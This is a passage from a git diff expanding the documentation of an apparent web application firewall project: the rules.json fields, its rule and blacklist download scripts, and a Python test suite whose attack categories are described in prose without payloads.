threshold has been reached. A higher score generally means a more severe attack. This score can be used for threshold-based blocking or other aggregation mechanisms in a broader system. | `5`, `10`, `1`, `3` | +| **`description`**| **Rule Description:** A string providing a human-readable description of the rule. It should explain what the rule is designed to detect. This description is useful for rule management, audits, and troubleshooting. | `Detect SQL injection attempts`, `Block access to admin pages`, `Detect XSS in request` | + +### Key Considerations: + +* **Rule Order:** The order of rules in `rules.json` can sometimes be significant, particularly with respect to how the WAF operates with regards to short-circuiting the rule chain after a match. In some WAF implementations, when a rule with action `block` is matched then the request is blocked and no further rules are processed. In other implementations, even if a `block` action is triggered, the rules may continue to execute but the original response will not change. +* **Regular Expression Performance:** Complex regular expressions can have a significant impact on WAF performance. Ensure the patterns are efficient and avoid complex backtracking if performance becomes an issue. +* **False Positives:** Rules must be carefully crafted to minimize false positives. Thoroughly test and validate rules with a wide range of requests to ensure proper operation. +* **Testing:** It is important to have a thorough testing strategy which includes both positive (attacks) and negative testing to be able to ensure that there are no false positives and that rules work correctly. +* **Rule Updates:** Regularly update rules based on new vulnerabilities and attack patterns. +* **Data Validation:** Ensure that the JSON is valid and that all fields are correctly formatted as expected. +* **Case sensitivity:** Regex patterns are case sensitive unless they are specifically marked as insensitive (e.g., `(?i)`). Header and cookie names in the `targets` field are not case sensitive. + +By using the `rules.json` format correctly and understanding the meaning of each rule field, you can create a robust and effective WAF configuration that provides strong protection against a wide range of web application attacks. This structured format enables granular control over the rules, allowing administrators to fine-tune the system for their specific environment and security needs. diff --git a/docs/scripts.md b/docs/scripts.md index cc82a4c..f3946a9 100644 --- a/docs/scripts.md +++ b/docs/scripts.md @@ -1,52 +1,139 @@ -# ๐Ÿ Rule/Blacklist Population Scripts +# ๐Ÿ Rule/Blacklists Population Scripts -Scripts to generate/download rules and blacklists: +To facilitate the management and population of rules and blacklists for the WAF, a set of Python scripts are provided. These scripts automate the process of fetching, converting, and downloading rules and blacklists from various external sources. These scripts help to simplify the process of keeping the WAF up to date with the latest threat intelligence. -## `get_owasp_rules.py` +Here's a detailed explanation of each script and its purpose: -* Fetches OWASP core rules and converts them to the required JSON format. +## `get_owasp_rules.py` -```bash -python3 get_owasp_rules.py -``` +* **Purpose:** This script is designed to fetch and process the OWASP Core Rule Set (CRS), which provides a foundation for general web application security. It fetches the rules, parses them, and converts them to the JSON format required by the WAF (`rules.json`). +* **Functionality:** + * The script downloads the latest version of the OWASP CRS. + * It extracts relevant rules and their metadata. + * It converts the rules to the WAF's JSON format. + * It saves the converted rules into the `rules.json` file. +* **Usage:** + + ```bash + python3 get_owasp_rules.py + ``` + +* **Considerations:** + * Ensure you have the necessary Python libraries installed (you can install them via `pip install requests`, or using `requirements.txt` if the repository has one) + * The OWASP CRS is a large ruleset, so the script may take some time to execute. + * The script will not override any custom rules you have on your configuration. + * The script is configured to obtain OWASP rules from a specific source, you may need to check the script if that source changes. + * You may want to customize or filter the rules that are loaded from OWASP in order to reduce the number of rules being processed by your WAF. ## `get_blacklisted_ip.py` -* Downloads IPs from several external sources. - -```bash -python3 get_blacklisted_ip.py -``` +* **Purpose:** This script downloads IP addresses from multiple external sources of known malicious IPs. The script combines them and converts them into a plain text format suitable for the WAF's `ip_blacklist.txt` file. +* **Functionality:** + * The script retrieves IP lists from various open-source threat intelligence feeds. + * It processes and combines these lists into a single list, removing duplicates and invalid entries. + * It saves the blacklisted IPs in the `ip_blacklist.txt` file, one IP address or CIDR block per line. +* **Usage:** + + ```bash + python3 get_blacklisted_ip.py + ``` +* **Considerations:** + * The script requires an active internet connection to download lists from external sources. + * The script combines multiple threat feeds, it is recommended to review the sources to make sure that you trust those lists. + * The script might be slow depending on the number of IPs that need to be processed and downloaded. + * You may want to review and filter the IP lists before loading them into your WAF, to avoid blocking legitimate traffic. + * The script is configured to obtain IP address lists from specific sources, you may need to check the script if any of the sources change. ## `get_blacklisted_dns.py` -* Downloads blacklisted domains from various sources. - -```bash -python3 get_blacklisted_dns.py -``` +* **Purpose:** This script downloads blacklisted domain names from several open-source threat intelligence feeds, creating the `dns_blacklist.txt` file. +* **Functionality:** + * The script fetches domain name lists from various threat intelligence feeds. + * It merges and removes duplicates from the fetched lists. + * It converts the domain names to lowercase and saves them into the `dns_blacklist.txt` file, one domain name per line. +* **Usage:** + + ```bash + python3 get_blacklisted_dns.py + ``` +* **Considerations:** + * The script requires an active internet connection to retrieve lists from external sources. + * The script combines multiple threat feeds, it is recommended to review the sources to make sure that you trust those lists. + * You may want to review and filter the domain lists before loading them into your WAF, to avoid blocking legitimate traffic. + * The script is configured to obtain domain lists from specific sources, you may need to check the script if any of the sources change. ## `get_spiderlabs_rules.py` -* Downloads rules from SpiderLabs. +* **Purpose:** This script retrieves rules from the SpiderLabs repository, which provides a collection of security rules developed by Trustwave SpiderLabs. +* **Functionality:** + * The script downloads the latest version of the SpiderLabs rules. + * It parses the rules and converts them into the WAF's JSON rule format. + * It saves the converted rules into the `rules.json` file. +* **Usage:** -```bash -python3 get_spiderlabs_rules.py -``` + ```bash + python3 get_spiderlabs_rules.py + ``` -## `get_vulnerability_rules.py` +* **Considerations:** + * Ensure you have the necessary Python libraries installed (you can install them via `pip install requests`, or using `requirements.txt` if the repository has one). + * The script requires an active internet connection to download rules. + * The rules may contain configurations not compatible with your setup. + * You may want to customize or filter the rules that are loaded from SpiderLabs to reduce the number of rules being processed. + * The script is configured to obtain SpiderLabs rules from a specific source, you may need to check the script if that source changes. -* Downloads rules related to known vulnerabilities. +## `get_vulnerability_rules.py` -```bash -python3 get_vulnerability_rules.py -``` +* **Purpose:** This script downloads rules related to specific known vulnerabilities. These rules are usually designed to protect against the exploitation of well-known flaws in software and web applications. +* **Functionality:** + * The script fetches rules from a source that is providing rules about known vulnerabilities (CVEs). + * It parses the rules and converts them to JSON. + * The rules are added to the `rules.json` file. +* **Usage:** -## `get_caddy_feeds.py` + ```bash + python3 get_vulnerability_rules.py + ``` -* Downloads pre-generated blacklists and rules from [this repository](https://github.com/fabriziosalmi/caddy-feeds/) to be used by the WAF. +* **Considerations:** + * Ensure you have the necessary Python libraries installed. + * The script requires an active internet connection. + * The effectiveness of the rules depends on the quality and timeliness of the vulnerability information. + * The script is configured to obtain vulnerability rules from a specific source, you may need to check the script if that source changes. + * You may want to customize or filter the rules that are loaded for known vulnerabilities to reduce the number of rules being processed or if you have patched that specific vulnerability. -```bash -python3 get_caddy_feeds.py -``` +## `get_caddy_feeds.py` +* **Purpose:** This script downloads pre-generated blacklists and rules from a specific repository, offering a convenient way to keep rules and blacklists up to date with community-driven content, from this repository. +* **Functionality:** + * The script fetches pre-generated JSON rules, blacklists and other feeds from a specific GitHub repository. + * It saves the downloaded files to the appropriate locations so that they can be used by the WAF. +* **Usage:** + + ```bash + python3 get_caddy_feeds.py + ``` +* **Considerations:** + * The script requires an active internet connection to download files from the repository. + * The repository is external, so you should trust the source before including the rules and blacklists. + * You may want to review and filter the files before using them, to avoid including unwanted content. + * The script is configured to obtain rules and blacklists from a specific repository, you may need to check the script if that source changes. + +## General Considerations for all scripts: + +* **Dependencies:** Ensure that you have all the required Python libraries installed (e.g., `requests`, `json`, and others). You can often install the required dependencies using `pip install -r requirements.txt` or `pip install `. +* **Internet Connection:** All scripts require an active internet connection to download resources from external locations. +* **File Paths:** The script may have hardcoded paths for the output files, check them to be sure they match your setup. +* **Trust Sources:** Always verify the trustworthiness of the sources used by the scripts before downloading data. +* **Customization:** You can modify these scripts to better fit your specific needs, such as: + * Adding new sources of rules and blacklists. + * Customizing the downloaded data before converting it to a specific format. + * Filtering out specific entries that may not be relevant for your application. +* **Scheduling:** It is recommend to automate the execution of these scripts to regularly fetch updated threat intelligence feeds. This will require using a scheduler like `cron` or other similar system. +* **Combining scripts:** These scripts can be combined into a single script or scheduled via `cron` to update rules and blacklists automatically. +* **Rate Limiting:** Be aware that if you execute these scripts too often from the same IP address, you might be rate limited by the source that serves the lists. +* **Testing:** Test the rules and blacklists after you obtain them to make sure they are working correctly and that there are no false positives. +* **Maintenance**: These scripts require periodic maintenance, if any of the sources they consume are moved, removed or changed. +* **Review**: Review the data obtained by those scripts before loading it into production, to ensure it does not have unwanted effects. + +These scripts provide a powerful set of tools to streamline the management of WAF rules and blacklists. By using them regularly, you can maintain a strong security posture and protect your applications from various threats. Remember to adapt the scripts to meet your specific needs and environment. diff --git a/docs/testing.md b/docs/testing.md index 60d72be..4fff331 100644 --- a/docs/testing.md +++ b/docs/testing.md @@ -1,31 +1,102 @@ # ๐Ÿงช Testing -## Basic Testing +The `test.py` script provides a comprehensive security testing suite designed to verify the effectiveness of the configured WAF rules. This script goes beyond basic checks and simulates a wide range of attack scenarios across various attack vectors. It provides detailed logging and a summary of the test results, allowing you to fine-tune your WAF rules and settings. -The included `test.sh` script sends a series of `curl` requests to test various attack scenarios: +## Purpose -```bash -./test.sh - ``` +The primary purpose of the `test.py` script is to: -## Load Testing +* **Automated Security Checks:** Provide an automated way to test the WAF against a broad range of attack scenarios, ensuring consistent and repeatable testing. +* **Rule Validation:** Verify the WAF rules are correctly configured and functioning as expected by simulating a wide range of attacks. +* **Detailed Logging:** Generate detailed logs of each test case, including the request details, response codes, and whether each test passed or failed. +* **Performance Tracking:** Track the number of passed and failed tests over time. This can be used to verify that changes in the WAF or its rules do not break expected behavior, which is a key indicator to ensure that the WAF is running well. +* **Identify Weaknesses:** Help identify specific areas where the WAF might be weak or have misconfigured rules so that they can be fixed accordingly. -Use a tool like `ab` to perform load testing: +## Functionality -```bash -ab -n 1000 -c 100 http://localhost:8080/ -``` +The `test.py` script works by: -## Security Testing Suite +1. **Defining Test Cases:** Each test case consists of: + * A descriptive name (`description`). + * A target URL (`url`). + * An expected HTTP response code (`expected_code`). + * Optional headers (`headers`). + * Optional request body (`body`). + * Optional category name, to help in organizing the output +2. **Sending Requests:** The script uses `curl` to send HTTP requests with the specified parameters. +3. **Response Verification:** After sending a request, it checks the HTTP response code and determines if it matches the expected value. +4. **Detailed Logging:** All test results are written to a log file (`waf_test_results.log`), including the test description, URL, headers, body, the expected code, and the actual response received. The log file is also categorized according to the test type. +5. **Test Summary:** At the end of the test run, a summary is printed to the console, which includes: + * The total number of tests. + * The number of tests that passed. + * The number of tests that failed. + * A message indicating if the test suite passed, or failed, depending on the number of failures. +6. **Color-Coded Output:** The output is color-coded to provide quick visual feedback. + * Green indicates a successful test. + * Red indicates a failed test or errors during the test. + * Blue indicates a general information or header of the test execution. + * Yellow indicates generic messages -The `test.py` script provides a comprehensive check to verify the effectiveness of the configured WAF rules. +## How to Run the Script -* Each test case will result in either a pass or a fail, based on the rules configured in the WAF. -* The output log contains detailed results for each test case, along with a summary of all tests performed. -* An overall percentage is reported at the end, and if the percentage is below 90%, it's recommended to review the output log for further analysis of the failing tests. -* The security testing suite will test SQL Injection, XSS, Path Traversal, RCE, and much more. You can find a list of tested attacks in the `test.py` script. -* To run the security testing suite: +1. **Ensure Python 3 is installed:** The script requires Python 3 to execute. +2. **Run the script:** + ```bash + python3 test.py + ``` +3. **Analyze the Output:** + * Review the console output for the overall test results. + * Examine the `waf_test_results.log` file for detailed information about each test case. + +## Script Usage ```bash -python3 test.py +python3 test.py --user-agent "My Custom User Agent" ``` + +* **`--user-agent` or `-ua`:** An optional argument to set a custom User-Agent string for all the tests. + +## Test Case Examples + +The `test_cases` list contains a wide variety of tests, each designed to simulate a particular vulnerability or attack vector. + +* **SQL Injection:** Multiple levels of SQL injection attempts including basic syntax, comment bypasses, union injections, and more. It also tests SQL injection via HTTP headers and cookies. +* **Cross-Site Scripting (XSS):** A large number of XSS attempts using script tags, image tags, event handlers, Javascript URLs, URL encoded and other obfuscated payloads. The tests include XSS payloads in GET parameters, cookies, headers and body. +* **Remote Code Execution (RCE):** Tests for command injection using various techniques including `cmd` parameter, shell commands, backticks, and other common payloads used in RCE attacks. RCE is also tested via HTTP headers and Cookies. +* **Path Traversal:** Tests multiple variations of path traversal by using double dots, triple dots, URL encoded path traversals, Unicode encoding, and other obfuscation techniques. Path traversal is also tested using headers and cookies. +* **Header Injection:** Various header injection techniques are tested such as X-Forwarded-For injection, Host header manipulation, Content-Type injection, and more. +* **Protocol Attacks:** Checks for exposure of configuration files, version control directories, and sensitive system files, using different path variations. +* **Scanner Detection:** Simulates requests from various vulnerability scanners, to verify that those are properly blocked. +* **Insecure Deserialization:** Tests Java, Python, and PHP deserialization vulnerabilities by sending serialized data. It includes tests via URL parameters, headers and cookies. +* **Server-Side Request Forgery (SSRF):** Simulates SSRF attacks by using a variety of protocols, IP addresses and techniques. SSRF is tested also via headers and cookies. +* **XML External Entity (XXE):** Tests XXE vulnerabilities using both inline and external entities, with and without parameter entities. XXE is tested via URL parameters, headers and body. +* **HTTP Request Smuggling:** Tests several HTTP request smuggling scenarios by using different header combinations, and checking how those are handled by the WAF. It includes tests via headers, body, and the main URL. +* **HTTP Response Splitting:** Tests how the WAF prevents HTTP response splitting attacks via GET parameters, headers and cookies, using different techniques such as newlines and CRLF. +* **Insecure Direct Object Reference (IDOR):** Tests several variations of IDOR attacks by using different paths, numeric and alphanumeric identifiers. +* **Clickjacking:** Tests if the WAF properly blocks clickjacking attacks, by injecting an `iframe` and checking if the WAF prevents rendering of the tested page in a frame. It includes tests with `object`, `embed`, `form`, `base`, `iframe` tags. +* **Cross-Site Request Forgery (CSRF):** Checks if the WAF has proper protection against CSRF attacks, including via GET, POST, different content types, and various other parameters. +* **Server-Side Template Injection (SSTI):** Tests how the WAF prevents SSTI attacks by sending expressions that should be evaluated by the template engine. SSTI is tested via URL parameters and headers. +* **Mass Assignment:** Tests for mass assignment attacks via a variety of techniques, like sending JSON payload that attempts to modify protected attributes. +* **NoSQL Injection:** Tests for common NoSQL injection payloads, specifically for MongoDB. +* **XPath Injection:** Test the effectiveness of the XPath injection protection with different payloads, including wildcards and XPath functions. +* **LDAP Injection:** Tests a variety of LDAP payloads including bypasses, wildcards and common LDAP filters. +* **XML Injection:** Tests for XML Injection vulnerabilities by sending malformed XML content and check if those are being properly filtered. This test is different from the XXE test as it tests other XML injection techniques. +* **File Upload:** Tests file upload vulnerabilities by sending a variety of malicious file types, including PHP, shell scripts, images with PHP code, and more. +* **JWT Attacks:** Tests various JWT attack scenarios by modifying the JWT algorithm, header, payload, signature, and testing some well known exploits. +* **GraphQL Injection:** Test the protection against GraphQL injection, by sending introspection queries, complex mutations, and other graphql attacks. +* **Valid Requests:** Includes tests that should pass, to verify that the WAF does not introduce false positives and it is working correctly with valid requests. + +## Best Practices + +* **Regular Testing:** Run the `test.py` script regularly, especially after modifying rules or blacklists. +* **Custom Test Cases:** Add new test cases to the `test_cases` list to test specific vulnerabilities or requirements that might be specific to your system. +* **Review Logs:** Review the `waf_test_results.log` file to identify failed tests and understand what might be the issue. +* **Customize Rules:** Adjust your WAF rules based on the test results to achieve the desired level of protection. +* **Dynamic Analysis:** In addition to running the automated test suite, perform manual security testing by interacting with your application and analyzing the behavior of the WAF in real time. +* **Integration with CI/CD:** Integrate the testing suite with your CI/CD pipelines to automate security testing as part of your software delivery process. +* **Real-World Scenarios:** Consider testing your rules against real-world attack scenarios using penetration testing tools. +* **Performance Testing:** The `test.py` script is not designed for performance testing, it is recommended to combine this test with load testing, using tools such as `ab` and others to ensure your WAF is performing correctly under high load. + +## Conclusion + +The `test.py` script is a comprehensive tool for security testing, allowing you to validate your WAF's effectiveness and identify potential vulnerabilities. By carefully analyzing the logs and output from this script, you can fine-tune your WAF configurations and rules, ensuring a high level of security for your web applications. Understanding how to interpret the results from this test suite is critical to guarantee that the WAF is working correctly and preventing potential attacks.